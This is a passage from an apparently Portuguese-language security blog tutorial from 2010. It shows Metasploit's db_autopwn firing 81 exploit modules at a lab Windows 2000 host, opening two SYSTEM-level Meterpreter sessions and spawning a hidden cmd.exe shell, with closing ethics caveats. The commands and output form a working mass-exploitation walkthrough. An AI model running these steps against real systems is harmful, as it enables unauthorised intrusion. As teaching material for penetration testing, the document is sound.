-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds


Hora da ação :P


msf > db_autopwn -p -t -e

[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.0.6:5800 exploit/windows/vnc/winvnc_http_get (port match)
[*] 192.168.0.6:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/filecopa_list_overflow (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/servu_mdtm (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/easyfilesharing_pass (port match)
[*] 192.168.0.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.0.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.0.6:445 exploit/linux/samba/trans2open (port match)
….

================================================================================
[*] (1/81 [0 sessions]): Launching exploit/windows/vnc/winvnc_http_get against 192.168.0.6:5800…
[*] (2/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.0.6:445…
[*] (3/81 [0 sessions]): Launching exploit/windows/ftp/filecopa_list_overflow against 192.168.0.6:21…
[*] (4/81 [0 sessions]): Launching exploit/windows/ftp/servu_mdtm against 192.168.0.6:21…
[*] (5/81 [0 sessions]): Launching exploit/windows/ftp/easyfilesharing_pass against 192.168.0.6:21…
[*] (6/81 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.6:445…
[*] (7/81 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.0.6:445…
[*] (8/81 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.0.6:445…
[*] (9/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.0.6:139…
….

[*] (81/81 [0 sessions]): Waiting on 35 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.0.3:46168 -> 192.168.0.6:15979) at Fri Oct 01 10:37:39 -0300 2010
[*] Meterpreter session 2 opened (192.168.0.3:43223 -> 192.168.0.6:24353) at Fri Oct 01 10:37:40 -0300 2010
[*] (81/81 [2 sessions]): Waiting on 22 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 12 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
….

[*] The autopwn command has completed with 2 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id Type Information Connection Via
— —- ———– ———- —

1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:46168 -> 192.168.0.6:15979 exploit/windows/dcerpc/ms03_026_dcom
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:43223 -> 192.168.0.6:24353 exploit/windows/dcerpc/ms03_026_dcom

[*] ================================================================================

Iniciando a sessão


msf > sessions -i 1

[*] Starting interaction with 1…


meterpreter > execute -i -H -f cmd.exe

Process 736 created.
Channel 1 created.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>


Observações importantes:


0 – Isso não é magia é tecnologia

1 – Estes testes são de caráter totalmente experimental;

2 – O uso destas ferramentas e ações requerem alguns conhecimentos prévios como:

* Entender sistemas operacionais;
* Entender profundamente o protocolo TCP/IP;
* Entender o funcionamento dos exploits, payloads, shellcodes e etc;
* Entender a dinâmica das causas e os impactos das vulnerabilidades;
* Usar estes conhecimentos de forma ética;

Google Bookmarks Twitter Technorati Favorites Google Gmail LinkedIn Google Reader WordPress Slashdot Reddit Delicious Multiply Digg Identi.ca Share



Tags deste artigo: nordeste psl bahia